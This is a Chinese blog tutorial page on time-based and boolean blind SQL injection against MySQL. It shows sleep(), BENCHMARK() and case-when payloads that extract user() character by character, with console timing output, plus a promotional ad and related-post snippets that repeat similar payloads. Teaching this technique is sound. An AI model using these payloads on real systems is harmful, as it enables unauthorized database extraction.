SQL注入学习之盲注(八)_笛卡尔积盲注

于 2024-04-26 22:20:37 发布
阅读量316 收藏 8
点赞数 5
文章标签: sql 学习 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84254011/article/details/138232223
版权

0x00 盲注

盲注我这里只归纳为

  1. 时间盲注
  2. 布尔盲注

其实在如今的实际环境中一般盲注的情况毕竟多,时间盲注太费时间 同时对网络要求比较高,二分,dnslog,等等可以加快注入的进程。

0x01 盲注中值得注意的问题

  1. 盲注中使用 and 你得确定你查询的值得存在 。
  2. 在返回多组数据的情况下,你的延时不再是 单纯的 sleep(5) 他将根据你返回的数据条数来反复执行
  3. 在如同搜索型时尽量搜索存在且数目较少的关键词
  4. 尽量不要使用 or

至于以上为什么会出现这种原因 推荐大家看看 这篇文章讲的很清楚https://www.t00ls.net/thread-45590-1-10.html

0x02 简单时间盲注

时间盲注也叫延时注入 一般用到函数 sleep() BENCHMARK() 还可以使用笛卡尔积(尽量不要使用,内容太多会很慢很慢),查阅mysql手册会发现很多东西

一般时间盲注我们还需要使用条件判断函数

if()

if(expre1,expre2,expre3) 当expre1为true时,返回expre2,false时,返回expre3
盲注的同时也配合着mysql提供的分割函,与正则函数 like函数,比较函数等等,还是那句话多看手册。

substr
substring
left
......

我们一般喜欢把分割的函数编码一下,当然不编码也行,编码的好处就是可以不用引号 常用到的就有 ascii() hex() 等等
benchmark()其作用是来测试一些函数的执行速度。benchmark()中带有两个参数,第一个是执行的次数,第二个是要执行的函数或者是表达式。

mysql> select * from users where id =1 and if((substr((select user()),1,1)='r'),sleep(5),1);
Empty set (5.01 sec)

mysql> select * from users where id =1 and if((substr((select user()),1,1)='r1'),sleep(5),1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id =1 and if((substr((select user()),1,1)='r'),BENCHMARK(20000000,md5('a')),1);
Empty set (5.15 sec)
case when then else end
mysql> select * from users where id =1 and case when (substr((select user()),1,1)="rr") then sleep(3) else 1 end;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id =1 and case when (substr((select user()),1,1)="r") then sleep(3) else 1 end;
Empty set (3.00 sec)

不推荐使用笛卡尔积当数据过多时会造成DOS。

0x03 布尔盲注

盲注思路的思路很多 比如正则匹配,比较函数,运算符,推荐大家可以看看
https://www.anquanke.com/post/id/170626

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取
部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

需要这份系统化资料的朋友,可以点击这里获取

2401_84254011
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
mdv.tar.gz_尔 C++
09-23
雷达数据转成MDV格式,便于在尔坐标中显示
SQL注入学习(八)
公众号:乌云安全
02-03 1133
0x00 我这里只归纳为 时间 布尔 其实在如今的实际环境中一般的情况毕竟多,时间太费时间 同时对网络要求比较高,二分,dnslog,等等可以加快注入的进程。 0x01 中值得意的问题 中使用 and 你得确定你查询的值得存在 。 在返回多组数据的情况下,你的延时不再是 单纯的 sleep(5) 他将根据你返回的数据条数来反复执行 在如同搜索型时尽量搜索存在且数目较少的关键词 尽量不要使用 or 至于以上为什么会出现这种原因 推荐大家看看
尔积sql_SQL注入经验大负荷注入
weixin_39944375的博客
12-09 877
:本文出自Gcow安全团队绝影小组成员瞳话SQL注入经验—利用尔算积进行大负荷注入在常见的渗透测试中,我们都知道SQL注入攻击中有联合查询,报错注入还有DNS注入等等,那么如果一个网站存在基于时间的,而恰好sleep这类核心函数被过滤的话,我们如何绕过进行注入呢,这里就分享一个经验——大负荷注入。一.尔算积作为一个数学7分的我来说,看到这个数学名词瞬间就不想接着往下...
MySQL
qq_39654116的博客
01-05 335
这里写目录标题布尔时间sleep函数benchmark函数尔积函数get_lock正则DOS RLIKE注入dnslog后续待补充 布尔 一般先看长度 id=4 and length(user())=14 布尔的方法 substr,substring,mid,left,right截取单个字符 id=4 and substr((select user()),1,1)=0x72 id=4 and left((select user()),1)=0x72 用ascii(),or
SQL
weixin_59872639的博客
02-18 2416
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为。 在中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,可分为两类: 基于布尔的(Boolean based) 基于时间的(Time based) 基于布尔的 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
关于时间的一些方法
huang_q_i的博客
07-23 157
时间的一些tips
JavaScript尔积超简单实现算法示例
10-18
主要介绍了JavaScript尔积超简单实现算法,涉及javascript数组遍历、添加简单操作技巧,需要的朋友可以参考下
gps.zip_GPS 坐标转换_极坐标_尔坐标系
09-24
尔坐标系,大地坐标系,站心地平坐标系(线型和极坐标形式)之间的转换源代码
螺线拟合.rar_matlab_尔 极坐标_螺线拟合
07-14
螺线的尔坐标系方程为: 螺线从尔坐标转为极坐标方程为: 阿基米德螺线在极坐标系下极径r和极角theta为线性关系,方程为: 计算步骤如下: 1.通常我们首先得到螺线在尔坐标下的一些点x,y。 2...
尔积sql
03-20
尔积概念 以及实现,是你在实现数据统计以分析更加全面系统
SQL注入
cike_y
08-15 1573
关于SQL注入的详细解析,有什么疑问欢迎大家提出
SQL 中的尔积
热门推荐
weixin_43078114的博客
12-01 2万+
进一步可以发现尔积和内连接的sql语句可以相互转化,这对我们理解内连接的本质和尔积的查询条件很重要内连接不加关联条件的结果就是尔积尔积在表数据量大的情况下查询结果会倍增,实际应用中一般会加查询条件过滤数据怎么理解迪儿积中的查询条件,可以将尔积sql转化成内连接sql去理解。
【ctf】sql注入——基于时间的
wlllllianqing的博客
09-18 778
基于时间的 原理:利用sleep()或benchmark()等函数让mysql执行时间变长,并结合判断条件if(expr1,expr2,expr3),然后通过页面的响应时间长短来判断语句返回的值是TRUE还是False,从而猜解一些未知的字段。 函数sleep(duration): 睡眠(暂停)时间为duration参数给定的秒数,然后返回0。若sleep()被中断,它会返回1。 select * from table where id=1 and sleep(3); select * from tab
SQL注入-基于时间的
qq_43691308的博客
04-06 875
SQL注入,mysql,时间
sql尔积现象以及运用
surge
12-08 3002
尔积在数据库中运用和解决办法
有了这个网络安全面试题,面试就像开了挂!(附PDF)
最新发布
lvaolan的博客
02-26 450
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
时间
aaartemis的博客
01-17 594
分为两类: 1.布尔 布尔很明显Ture跟Fales,也就是说它只会根据. 你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。 2.时间 界面返回值只有一种,true.无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确。 简书:Hell0_C 时间 逐字注入 select * fro...
SQL注入之五大注入手法
Clannad的博客
10-30 9519
文章目录1、UNION query SQL injection(可联合查询注入)2、Error-based SQL injection(报错型注入)3、Boolean-based blind SQL injection(布尔型注入)4、Time-based blind SQL injection(基于时间延迟注入)5、Stacked queries SQL injection(可多语句查询注入/堆...
基于时间的原理简介
m0_38103658的博客
08-30 6357
基于时间的 简介 就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为原理 的本质就是猜解,在没有回显数据的情况下,我们只能靠‘感觉’来体会每次查询时一点点细微的差异,而这差异包括运行时间的差异和页面返回结果的差异。 对于基于布尔的来说,我们可以构造一条注入语句来测试我们输入的布尔表...
SqlServer双标联合查询去除尔积
06-03
在进行双表联合查询时,如果没有正确的使用关联条件,就会出现尔积的情况,导致查询结果出现重复的数据。去除尔积的方法有以下几种: 1. 明确指定关联条件:在使用双表联合查询时,应该明确指定两个表之间...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值